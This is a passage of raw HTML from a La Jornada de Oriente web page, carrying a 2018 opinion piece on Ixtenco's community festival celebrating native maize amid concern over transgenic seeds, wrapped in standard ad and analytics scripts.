<!DOCTYPE html><html lang="es-ES" prefix="og: http://ogp.me/ns#"><head> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script>(adsbygoogle = window.adsbygoogle || []).push({
    google_ad_client: "ca-pub-4489966912064550",
    enable_page_level_ads: true
  });</script> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script>(adsbygoogle = window.adsbygoogle || []).push({
          google_ad_client: "ca-pub-4489966912064550",
          enable_page_level_ads: true
     });</script> <meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2" /><link type="text/css" media="all" href="http://www.lajornadadeoriente.com.mx/wp-content/cache/autoptimize/css/autoptimize_6f6f6a4af4cb2718770dc158d3dd45c0.css" rel="stylesheet" /><title>En tiempos transgénicos, Ixtenco celebra al maíz nativo</title><link rel="profile" href="http://gmpg.org/xfn/11" /><link rel="pingback" href="http://www.lajornadadeoriente.com.mx/xmlrpc.php" /><link rel="shortcut icon" href="http://www.lajornadadeoriente.com.mx/wp-content/themes/jornadaberry_future/images/favicon16.png" /><!-- This site is optimized with the Yoast SEO plugin v3.5 - https://yoast.com/wordpress/plugins/seo/ --><meta name="description" content="La Feria del Maíz: Una iniciativa comunitaria gestada con la intención de conservar, difundir y defender los maíces nativos de la región."/><meta name="robots" content="noodp"/><link rel="canonical" href="http://www.lajornadadeoriente.com.mx/2018/03/30/ixtenco-celebra-maiz-nativo/" /><meta property="og:locale" content="es_ES" /><meta property="og:type" content="article" /><meta property="og:title" content="En tiempos transgénicos, Ixtenco celebra al maíz nativo" /><meta property="og:description" content="La Feria del Maíz: Una iniciativa comunitaria gestada con la intención de conservar, difundir y defender los maíces nativos de la región." /><meta property="og:url" content="http://www.lajornadadeoriente.com.mx/2018/03/30/ixtenco-celebra-maiz-nativo/" /><meta property="og:site_name" content="La Jornada de Oriente" /><meta property="article:section" content="Colaboraciones" /><meta property="article:published_time" content="2018-03-30T17:31:15-06:00" /><meta property="article:modified_time" content="2018-03-30T20:11:39-06:00" /><meta property="og:updated_time" content="2018-03-30T20:11:39-06:00" /><meta property="og:image" content="http://www.lajornadadeoriente.com.mx/wp-content/uploads/2018/03/dsc6037.jpg" /><meta property="og:image:width" content="579" /><meta property="og:image:height" content="384" /><meta name="twitter:card" content="summary" /><meta name="twitter:description" content="La Feria del Maíz: Una iniciativa comunitaria gestada con la intención de conservar, difundir y defender los maíces nativos de la región." /><meta name="twitter:title" content="En tiempos transgénicos, Ixtenco celebra al maíz nativo" /><meta name="twitter:image" content="http://www.lajornadadeoriente.com.mx/wp-content/uploads/2018/03/dsc6037.jpg" /> <!-- / Yoast SEO plugin. --><link rel='dns-prefetch' href='//s.w.org' /><link rel="alternate" type="application/rss+xml" title="La Jornada de Oriente &raquo; Feed" href="http://www.lajornadadeoriente.com.mx/feed/" /><link rel="alternate" type="application/rss+xml" title="La Jornada de Oriente &raquo; RSS de los comentarios" href="http://www.lajornadadeoriente.com.mx/comments/feed/" /><link rel='https://api.w.org/' href='http://www.lajornadadeoriente.com.mx/wp-json/' /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.lajornadadeoriente.com.mx/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.lajornadadeoriente.com.mx/wp-includes/wlwmanifest.xml" /><meta name="generator" content="WordPress 4.6.1" /><link rel='shortlink' href='http://www.lajornadadeoriente.com.mx/?p=407358' /><link rel="alternate" type="application/json+oembed" href="http://www.lajornadadeoriente.com.mx/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.lajornadadeoriente.com.mx%2F2018%2F03%2F30%2Fixtenco-celebra-maiz-nativo%2F" /><link rel="alternate" type="text/xml+oembed" href="http://www.lajornadadeoriente.com.mx/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.lajornadadeoriente.com.mx%2F2018%2F03%2F30%2Fixtenco-celebra-maiz-nativo%2F&#038;format=xml" /><meta property="og:title" content="En tiempos transgénicos, Ixtenco celebra al maíz nativo" /><meta property="og:type" content="article" /><meta property="og:image" content="http://www.lajornadadeoriente.com.mx/wp-content/uploads/2018/03/dsc6037.jpg" /><meta property="og:image:width" content="600" /><meta property="og:image:height" content="314" /><meta property="og:url" content="http://www.lajornadadeoriente.com.mx/2018/03/30/ixtenco-celebra-maiz-nativo/" /><meta property="og:description" content="“México se acaba donde el maíz se muere” escribió en su poesía Gabriela Mistral, y no podría describirse mejor la relación que nuestros pueblos han mantenido con esta herencia milenaria. Ab aeterno, el maíz nativo ha sido el alimento base de la población mexicana; “somos hombres y mujeres de maíz”, comentaba un campesino mientras observaba [...]" /><meta property="og:site_name" content="La Jornada de Oriente" /><meta property="fb:app_id" content="201471650138"/><!--<script type="text/javascript" src="http://www.lajornadadeoriente.com.mx/wp-content/themes/jornadaberry_future/js/jquery.tipsy.js"></script>--> <!--<script type="text/javascript" src="http://www.lajornadadeoriente.com.mx/wp-content/themes/jornadaberry_future/swfobject/swfobject.js"></script>--><!--<script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"></script> --> <!-- <script type="text/javascript" src="http://www.lajornadadeoriente.com.mx/wp-includes/js/jquery/jquery.js"></script> <script type="text/javascript" src="http://www.lajornadadeoriente.com.mx/wp-content/themes/jornadaberry_future/js/gmap.js"></script> <script type="text/javascript" src="http://www.lajornadadeoriente.com.mx/wp-content/themes/jornadaberry_future/js/flexslider/jquery.flexslider-min.js"></script> <script type="text/javascript" src="http://www.lajornadadeoriente.com.mx/wp-content/themes/jornadaberry_future/js/custom.js"></script> --><!--[if IE]><link rel="stylesheet" href="/css/ie.css" type="text/css" media="all"/> <![endif]--></head><body> <!-- <script type="text/javascript">var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-21879546-1']);
  _gaq.push(['_trackPageview']);

  (function() {
    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  })();</script> --> <script>(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-21879546-1', 'auto');
  ga('send', 'pageview');</script> <div id="fb-root"></div> <input type="hidden" id="pp_homepage_slider_trans" name="pp_homepage_slider_trans" value="fade"/> <input type="hidden" id="pp_homepage_url" name="pp_homepage_url" value="http://www.lajornadadeoriente.com.mx"/><div id="wrapper"><div id="header_wrapper"><div class="standard_wrapper"><div class="menu-principal-container"><ul id="main_menu" class="main_nav"><li id="menu-item-34564" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-34564"><a href="http://www.lajornadadeoriente.com.mx/">Inicio</a></li><li id="menu-item-34567" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-34567"><a href="http://www.lajornadadeoriente.com.mx/archivo/archivo.php">Números Anteriores</a></li><li id="menu-item-34565" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-34565"><a href="#">Secciones</a><ul class="sub-menu"><li id="menu-item-46" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-46"><a href="http://www.lajornadadeoriente.com.mx/categorias/noticias/deportes/">Deportes</a></li><li id="menu-item-47" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-47"><a href="http://www.lajornadadeoriente.com.mx/categorias/noticias/educacion/">Educación</a></li><li id="menu-item-201" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-201"><a href="http://www.lajornadadeoriente.com.mx/categorias/noticias/cultura/">Cultura</a></li><li id="menu-item-202" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-202"><a href="http://www.lajornadadeoriente.com.mx/categorias/noticias/politica/">Política</a></li><li id="menu-item-33470" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-33470"><a href="http://www.lajornadadeoriente.com.mx/categorias/noticias/capital_conurbados/">Capital y Conurbados</a></li><li id="menu-item-33472" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-33472"><a href="http://www.lajornadadeoriente.com.mx/categorias/noticias/sociedad_y_justicia/">Sociedad y Justicia</a></li><li id="menu-item-33473" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-33473"><a href="http://www.lajornadadeoriente.com.mx/categorias/noticias/estado/">Estado</a></li><li id="menu-item-33474" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-33474"><a href="http://www.lajornadadeoriente.com.mx/categorias/noticias/economia_y_ecologia/">Economía y Ecología</a></li></ul></li><li id="menu-item-41291" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-has-children menu-item-41291"><a href="http://www.lajornadadeoriente.com.mx/categorias/opinion/">Opinión</a><ul class="sub-menu"><li id="menu-item-41294" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-41294"><a href="http://www.lajornadadeoriente.com.mx/categorias/opinion/a_debate/">A debate</a></li><li id="menu-item-41297" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-41297"><a href="http://www.lajornadadeoriente.com.mx/categorias/opinion/alternativa_economica/">Alternativa Económica</a></li><li id="menu-item-41301" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-41301"><a href="http://www.lajornadadeoriente.com.mx/categorias/opinion/carpeta/">Carpeta</a></li><li id="menu-item-41302" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-41302"><a href="http://www.lajornadadeoriente.com.mx/categorias/opinion/cine/">Cine</a></li><li id="menu-item-41303" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-41303"><a href="http://www.lajornadadeoriente.com.mx/categorias/opinion/colaboraciones/">Colaboraciones</a></li><li id="menu-item-41305" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-41305"><a href="http://www.lajornadadeoriente.com.mx/categorias/opinion/del-baul/">Del Baúl</a></li><li id="menu-item-147815" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-147815"><a href="http://www.lajornadadeoriente.com.mx/categorias/disonancias/">Disonancias</a></li><li id="menu-item-329128" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-329128"><a href="http://www.lajornadadeoriente.com.mx/categorias/opinion/del-hecho-al-dicho/">Del hecho al dicho</a></li><li id="menu-item-41306" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-41306"><a href="http://www.lajornadadeoriente.com.mx/categorias/opinion/economia_a_retazos/">Economía a Retazos</a></li><li id="menu-item-41307" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-41307"><a href="http://www.lajornadadeoriente.com.mx/categorias/opinion/efemerides-deportivas/">Efemérides deportivas</a></li><li id="menu-item-41308" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-41308"><a href="http://www.lajornadadeoriente.com.mx/categorias/opinion/entrepanes/">Entrepanes</a></li><li id="menu-item-41309" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-41309"><a href="http://www.lajornadadeoriente.com.mx/categorias/opinion/epidemio-logica/">Epidemio-Lógica</a></li><li id="menu-item-41310" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-41310"><a href="http://www.lajornadadeoriente.com.mx/categorias/opinion/estetica_y_salud/">Estética y Salud</a></li><li id="menu-item-41311" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-41311"><a href="http://www.lajornadadeoriente.com.mx/categorias/opinion/maestros/">Maestros</a></li><li id="menu-item-41312" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-41312"><a href="http://www.lajornadadeoriente.com.mx/categorias/opinion/marcos-a-la-medida/">Marcos a la medida</a></li><li id="menu-item-41313" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-41313"><a href="http://www.lajornadadeoriente.com.mx/categorias/opinion/medicina_e_investigacion/">Medicina e Investigación</a></li><li id="menu-item-41314" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-41314"><a href="http://www.lajornadadeoriente.com.mx/categorias/opinion/medieros/">Medieros</a></li><li id="menu-item-41315" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-41315"><a href="http://www.lajornadadeoriente.com.mx/categorias/opinion/memoria/">Memoria</a></li><li id="menu-item-41316" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-41316"><a href="http://www.lajornadadeoriente.com.mx/categorias/opinion/periscopio-opinion/">Periscopio</a></li><li id="menu-item-136120" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-136120"><a href="http://www.lajornadadeoriente.com.mx/categorias/opinion/salud/">Salud</a></li><li id="menu-item-136122" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-136122"><a href="http://www.lajornadadeoriente.com.mx/categorias/opinion/semanalisis/">Semanálisis</a></li><li id="menu-item-136123" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-136123"><a href="http://www.lajornadadeoriente.com.mx/categorias/opinion/solo_para_abogados/">Sólo para Abogados</a></li><li id="menu-item-136124" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-136124"><a href="http://www.lajornadadeoriente.com.mx/categorias/opinion/tauromaquia/">Tauromaquia</a></li><li id="menu-item-147816" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-147816"><a href="http://www.lajornadadeoriente.com.mx/categorias/tianguis/">Tianguis</a></li></ul></li><li id="menu-item-127506" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-127506"><a href="http://www.lajornadadeoriente.com.mx/categorias/blogs/">Blogs</a><ul class="sub-menu"><li id="menu-item-127509" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-127509"><a href="http://www.lajornadadeoriente.com.mx/categorias/blogs/b_alte-blogs/">Altepetl</a></li><li id="menu-item-136127" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-136127"><a href="http://www.lajornadadeoriente.com.mx/categorias/blogs/botica/">Botica</a></li><li id="menu-item-136128" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-136128"><a href="http://www.lajornadadeoriente.com.mx/categorias/blogs/silencio/">Consciencia&#8230;¡Despierta!</a></li><li id="menu-item-136129" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-136129"><a href="http://www.lajornadadeoriente.com.mx/categorias/blogs/b_blog_de_rafael/">El blog de Rafael H. Pagán Santini</a></li><li id="menu-item-136130" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-136130"><a href="http://www.lajornadadeoriente.com.mx/categorias/blogs/zenzontle-blogs/">El Zenzontle</a></li><li id="menu-item-136131" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-136131"><a href="http://www.lajornadadeoriente.com.mx/categorias/blogs/condenados_sierra/">Los condenados de la sierra</a></li><li id="menu-item-136125" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-136125"><a href="http://www.lajornadadeoriente.com.mx/categorias/blogs/saber/">Saber sin fin</a></li><li id="menu-item-127510" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-127510"><a href="http://www.lajornadadeoriente.com.mx/categorias/blogs/semblanzas_relatos/">Semblanzas y relatos</a></li><li id="menu-item-127511" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-127511"><a href="http://www.lajornadadeoriente.com.mx/categorias/blogs/territorio_libertad/">Territorio y Libertad</a></li><li id="menu-item-136126" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-136126"><a href="http://www.lajornadadeoriente.com.mx/categorias/blogs/b_tiempo/">Tiempos de furia</a></li></ul></li><li id="menu-item-42295" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-42295"><a href="http://www.lajornadadeoriente.com.mx/edicion-impresa/">Edición Impresa</a></li><li id="menu-item-216056" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-216056"><a href="http://www.lajornadadeoriente.com.mx/contacto/">Contacto</a></li></ul></div><div id="menu_border_wrapper"></div><div class="social_wrapper"><ul><li><a target="_blank" title="La Jornada de Oriente en Facebook" href=" https://www.facebook.com/lajornadadeoriente/  "><img src="http://www.lajornadadeoriente.com.mx/wp-content/themes/jornadaberry_future/images/social_black/facebook.png" alt=""/></a></li><li><a target="_blank" title="La Jornada de Oriente en Twitter" href=" https://twitter.com/jornadaoriente  "> <img src="http://www.lajornadadeoriente.com.mx/wp-content/themes/jornadaberry_future/images/social_black/twitter.png" alt=""/></a></li><li><a target="_blank" title="La Jornada de Oriente en Google+" href="https://plus.google.com/117083728200096644534/"><img src="http://www.lajornadadeoriente.com.mx/wp-content/themes/jornadaberry_future/images/social_black/google.png" alt=""/></a></li></ul></div></div></div><div id="boxed_wrapper"><div class="header_ads"> <!-- --><div class="estas_viendo_edo"> <span class="txt_estas_viendo">Est&aacute;s viendo la versi&oacute;n de </span><h3>Puebla</h3> <a class="txt_cambiar_a" href="/index.php?ciudad_tlaxcala=1&">Cambiar a Tlaxcala</a></div><div class="logo"> <a href="/"><img src="http://www.lajornadadeoriente.com.mx/wp-content/themes/jornadaberry_future/images/lajornadadeoriente.png" alt="La Jornada de Oriente"></a></div></div><div class="header_fecha"> <strong> VIERNES, 30 DE MARZO DE 2018 </strong> <!--
<br> <span class="txt_directorio">DIRECTOR FUNDADOR: CARLOS PAYÁN ■ DIRECTORA GENERAL: CARMEN LIRA ■ PUBLICACIÓN PARA PUEBLA Y TLAXCALA</span> --></div><div id="google_busqueda"><form action="http://www.google.com.mx" id="cse-search-box" target="_blank"><div> <input type="hidden" name="cx" value="partner-pub-4489966912064550:9629119975" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="78" style="float: left;"/> <input type="submit" name="sa" value="Buscar" style="float: left;" /></div></form></div> <!--<script type="text/javascript" src="http://www.google.com.mx/coop/cse/brand?form=cse-search-box&amp;lang=es"></script>--> <span class="salto"><br class="clear"/></span><div class="sep_bar"></div> <br class="clear"/><div><div class="google_ad_top_leader"> <!-- DIRECTA DESDE ADSENSE	--> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- 2017_banner_top_970x90_home_pue --> <ins class="adsbygoogle"
style="display:inline-block;width:970px;height:90px"
data-ad-client="ca-pub-4489966912064550"
data-ad-slot="2569981975"></ins> <script>(adsbygoogle = window.adsbygoogle || []).push({});</script> <!--		FIN DIRECTA DESDE ADSENSE --></div> <!--<div class="google_ad_top_234" align="center"> PortadaTop234x60 ELIMINADO, ahora banner Kuojta.. diciem-2016  --> <!--<div id='div-gpt-ad-1424595138100-0' style='width:234px; height:60px;'> <script type='text/javascript'>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1424595138100-0'); });</script> </div> --> <!--<div style='width:234px; height:60px;'> <a href="/kuojta/"><img src="/wp-content/uploads/2015/12/kuojta-banner.jpg" /></a></div></div> --><div class="google_ad_top_movil" align="center"> <!-- bloque1_home_320x50 --><div id='div-gpt-ad-1424595641984-0' style='width:320px; height:50px;'></div></div></div><p style="display:none;"></p><br class="clear"/><!-- Begin content --><div id="content_wrapper" itemscope itemtype="http://schema.org/Article"><meta itemscope itemprop="mainEntityOfPage" itemtype="https://schema.org/WebPage" itemId="http://www.lajornadadeoriente.com.mx/2018/03/30/ixtenco-celebra-maiz-nativo/ "><div class="articulo-organizacion" itemprop="publisher" itemscope="" itemtype="https://schema.org/Organization"><meta itemprop="url" content="http://www.lajornadadeoriente.com.mx"><meta itemprop="name" content="LA JORNADA DE ORIENTE"><div itemprop="logo" itemscope="" itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="http://www.lajornadadeoriente.com.mx/wp-content/themes/jornadaberry_future/images/lajornadadeoriente.png"><meta itemprop="width" content="700"><meta itemprop="height" content="66"></div></div><div class="inner"> <!-- Begin main content --><div class="inner_wrapper"><div class="sidebar_content"><!-- Begin each blog post --><div class="post_wrapper"><div class="post_header_wrapper"><div class="post_header single_post"><h5> ■ <a href="http://www.lajornadadeoriente.com.mx/categorias/opinion/colaboraciones/"><span itemprop="genre">COLABORACIONES</span></a><script type="text/javascript">function udm_(e){var t="comScore=",n=document,r=n.cookie,i="",s="indexOf",o="substring",u="length",a=2048,f,l="&ns_",c="&",h,p,d,v,m=window,g=m.encodeURIComponent||escape;if(r[s](t)+1)for(d=0,p=r.split(";"),v=p[u];d<v;d++)h=p[d][s](t),h+1&&(i=c+unescape(p[d][o](h+t[u])));e+=l+"_t="+ +(new Date)+l+"c="+(n.characterSet||n.defaultCharset||"")+"&c8="+g(n.title)+i+"&c7="+g(n.URL)+"&c9="+g(n.referrer),e[u]>a&&e[s](c)>0&&(f=e[o](0,a-8).lastIndexOf(c),e=(e[o](0,f)+l+"cut="+g(e[o](f+1)))[o](0,a)),n.images?(h=new Image,m.ns_p||(ns_p=h),h.src=e):n.write("<","p","><",'img src="',e,'" height="1" width="1" alt="*"',"><","/p",">")};
function uid_call(a, b){
ui_c2 = 20459371; // your corporate c2 client value
ui_sitio = 'oriente'; // your sites identifier
window.b_ui_event = window.c_ui_event != null ? window.c_ui_event:"",window.c_ui_event = a;
var ui_pixel_url = 'http://b.scorecardresearch.com/p?c1=2&c2='+ui_c2+'&sitio='+ui_sitio+'&name='+a+'&ns_type=hidden&type=hidden&ns_ui_type='+b;
var b="comScore=",c=document,d=c.cookie,e="",f="indexOf",g="substring",h="length",i=2048,j,k="&ns_",l="&",m,n,o,p,q=window,r=q.encodeURIComponent||escape;if(d[f](b)+1)for(o=0,n=d.split(";"),p=n[h];o<p;o++)m=n[o][f](b),m+1&&(e=l+unescape(n[o][g](m+b[h])));ui_pixel_url+=k+"_t="+ +(new Date)+k+"c="+(c.characterSet||c.defaultCharset||"")+"&c8="+r(c.title)+e+"&c7="+r(c.URL)+"&c9="+r(c.referrer)+"&b_ui_event="+b_ui_event+"&c_ui_event="+c_ui_event,ui_pixel_url[h]>i&&ui_pixel_url[f](l)>0&&(j=ui_pixel_url[g](0,i-8).lastIndexOf(l),ui_pixel_url=(ui_pixel_url[g](0,j)+k+"cut="+r(ui_pixel_url[g](j+1)))[g](0,i)),c.images?(m=new Image,q.ns_p||(ns_p=m),m.src=ui_pixel_url):c.write("<p><img src='",ui_pixel_url,"' height='1' width='1' alt='*'></p>");
}
udm_('http://b.scorecardresearch.com/b?c1=2&c2=20459371&sitio=oriente&name=colaboraciones.en_tiempos_transgenicos_ixtenco_celebra_al_maiz_nativo');</script> <noscript><p><img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=20459371&amp;sitio=su-sitio&amp;name=colaboraciones.en_tiempos_transgenicos_ixtenco_celebra_al_maiz_nativo" height="1" width="1" alt="*"></p></noscript> <script type="text/javascript" src="http://b.scorecardresearch.com/c2/20459371/ct.js"></script> </h5><h1 itemprop="headline">En tiempos transgénicos, Ixtenco celebra al maíz nativo</h1></div></div> <br class="clear"/><div class="post_wrapper_inner"><div class="post_detail space half"><div style="float: right;"> Comparte esta nota:<ul class="social_media"><li> <a target="_blank" href="http://twitter.com/home?status=En tiempos transgénicos, Ixtenco celebra al maíz nativo http://www.lajornadadeoriente.com.mx/2018/03/30/ixtenco-celebra-maiz-nativo/" title="Retweet"> <img src="http://www.lajornadadeoriente.com.mx/wp-content/themes/jornadaberry_future/images/social_black/twitter.png" alt=""/> </a></li><li> <!--&p[url]=--><!--&p[images][0]=','sharer','toolbar=0,status=0,width=700,height=350');" href="javascript: void(0)"> */ --> <a id="fb-share" style='text-decoration:none;' type="icon_link" onClick="window.open('http://m.facebook.com/sharer.php?u=http://www.lajornadadeoriente.com.mx/2018/03/30/ixtenco-celebra-maiz-nativo/&p[images][0]=','sharer','toolbar=0,status=0,width=700,height=350');" href="javascript: void(0)"> <img src="http://www.lajornadadeoriente.com.mx/wp-content/themes/jornadaberry_future/images/social_black/facebook.png" alt=""/> </a></li><li> <a target="_blank" href="http://www.google.com/bookmarks/mark?op=edit&bkmk=http://www.lajornadadeoriente.com.mx/2018/03/30/ixtenco-celebra-maiz-nativo/&title=En tiempos transgénicos, Ixtenco celebra al maíz nativo&annotation=" title="Google+"> <img src="http://www.lajornadadeoriente.com.mx/wp-content/themes/jornadaberry_future/images/social_black/google.png" alt=""/> </a></li><li style="padding-top: 8px;"> <a href="www.lajornadadeoriente.com.mx/envio-nota/?id=www.lajornadadeoriente.com.mx/2018/03/30/ixtenco-celebra-maiz-nativo/" class="fancybox fancybox.iframe" target="_blank" title="Comparte por Correo"><img src="http://www.lajornadadeoriente.com.mx/wp-content/themes/jornadaberry_future/images/social_black/mail2.png" alt=""/> </a></li></ul></div><img src="http://www.lajornadadeoriente.com.mx/wp-content/themes/jornadaberry_future/images/clock.png" class="middle"/>&nbsp;<time datetime="30/03/2018 17:31"><span itemprop="datePublished">30/03/2018 17:31</span></time>&nbsp; <br> <img src="http://www.lajornadadeoriente.com.mx/wp-content/themes/jornadaberry_future/images/author.png" class="middle"/>&nbsp;<span itemprop="author" itemscope itemtype="http://schema.org/Person">Publicado por <strong> <a href="http://www.lajornadadeoriente.com.mx/author/hannah_haaz/" title="Entradas por Hannah Yahel Haaz Barahona" class="author url fn" rel="author"><span itemprop="name">Hannah Yahel Haaz Barahona</span></a> </strong> </span> <!--    <br> <img src="/images/comment_alt2_stroke_14x16.png" class="middle"/>&nbsp; --></div></div> <br class="clear"/><div class="post_wrapper_inner"><div class="post_img"> <a href="http://www.lajornadadeoriente.com.mx/2018/03/30/ixtenco-celebra-maiz-nativo/" title="En tiempos transgénicos, Ixtenco celebra al maíz nativo"> <img itemprop="image" src="http://www.lajornadadeoriente.com.mx/wp-content/uploads/2018/03/dsc6037-579x384.jpg" alt="" class="post_img_featured"/> ¿Cómo involucrar a la gente en un proceso tan arduo?, en la defensa de un grano que “debiera ser tratado como tesoro nacional”, aseguran los campesinos. </a></div><div class="post_inner_wrapper"> <!-- <br class="clear"/> --><div  style="width:50%; float:right; margin: 0px 0 15px 5px"></div> <span itemprop="articleBody"><p><span style="font-weight: 400;">“<strong>México se acaba donde el maíz se muere</strong>” escribió en su poesía Gabriela Mistral, y no podría describirse mejor la relación que nuestros pueblos han mantenido con esta herencia milenaria. </span></p><p style="text-align: justify;"><span style="font-weight: 400;">Ab aeterno, el maíz nativo ha sido el <strong>alimento base de la población mexicana</strong>; “somos <a href="https://www.youtube.com/watch?time_continue=6&amp;v=-ws87e85MbU" target="_blank">hombres y mujeres de maíz</a>”, comentaba un campesino mientras observaba con detenimiento las decenas de variedades de grano que abundaban las mesas del kiosko del municipio tlaxcalteca de San Juan Ixtenco con motivo de la octava edición de la <strong>Fiesta del Maíz</strong>.</span></p><p style="text-align: center;"><b>Un festejo a la vitalidad mexicana</b></p><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <ins class="adsbygoogle"
style="display:block; text-align:center;"
data-ad-layout="in-article"
data-ad-format="fluid"
data-ad-client="ca-pub-4489966912064550"
data-ad-slot="2059162415"></ins> <script>(adsbygoogle = window.adsbygoogle || []).push({});</script> <p style="text-align: center;"><a href="http://www.lajornadadeoriente.com.mx/wp-content/uploads/2018/03/dsc6033.jpg"><img class="size-full wp-image-407360 aligncenter" src="http://www.lajornadadeoriente.com.mx/wp-content/uploads/2018/03/dsc6033.jpg" alt="_dsc6033" width="579" height="384" srcset="http://www.lajornadadeoriente.com.mx/wp-content/uploads/2018/03/dsc6033.jpg 579w, http://www.lajornadadeoriente.com.mx/wp-content/uploads/2018/03/dsc6033-150x99.jpg 150w, http://www.lajornadadeoriente.com.mx/wp-content/uploads/2018/03/dsc6033-406x269.jpg 406w" sizes="(max-width: 579px) 100vw, 579px" /></a></p><p style="text-align: justify;"><span style="font-weight: 400;">Ixtenco, “atole agrio que se toma en la fiesta” en otomí, ha logrado resguardar su lengua y tradición prehispánica por más de <strong>500 años</strong> desde su fundación en las faldas orientales del Malintzin. Por ello, la “Ngo r’e dethä”, nombre del festejo en la lengua nativa del lugar, es una iniciativa comunitaria que desde hace ocho años fue gestada con la intención de <strong>conservar, difundir y defender</strong> los maíces criollos de la región.  </span></p><p style="text-align: justify;"><span style="font-weight: 400;">Por tanto, el pasado 23 y 24 de marzo, los pobladores de Ixtenco dejaron de lado el descontento social que se vive en su comunidad a raíz de los <a href="http://www.lajornadadeoriente.com.mx/2018/03/22/exigen-pobladores-ixtenco-autoridades-solucionen-conflicto-municipal/" target="_blank">conflictos</a> sucedidos con la administración pública en turno, para suscitar la celebración al producto y actividad al que <strong>han dedicado su vida</strong> por generaciones. </span></p><p style="text-align: justify;"><span style="font-weight: 400;">Prepararon un conjunto de actividades: pláticas sobre la soberanía alimentaria en tiempos de oligopolización de la producción de semillas, mesas de intercambio de los saberes de los campesinos, danzas y cantos a la vitalidad del maíz, entre otros tantos talleres y proyecciones de documentales que se encargaron de revelar el provecho de la <a href="http://www.revistaciencias.unam.mx/pt/41-revistas/revista-ciencias-92-93/152--92-93-articulo-04.html" target="_blank">riqueza concentrada en este grano</a>.</span></p><p style="text-align: justify;"><span style="font-weight: 400;"><a href="http://www.lajornadadeoriente.com.mx/wp-content/uploads/2018/03/dsc6036.jpg"><img class="alignleft size-full wp-image-407361" src="http://www.lajornadadeoriente.com.mx/wp-content/uploads/2018/03/dsc6036.jpg" alt="_dsc6036" width="579" height="352" srcset="http://www.lajornadadeoriente.com.mx/wp-content/uploads/2018/03/dsc6036.jpg 579w, http://www.lajornadadeoriente.com.mx/wp-content/uploads/2018/03/dsc6036-150x91.jpg 150w, 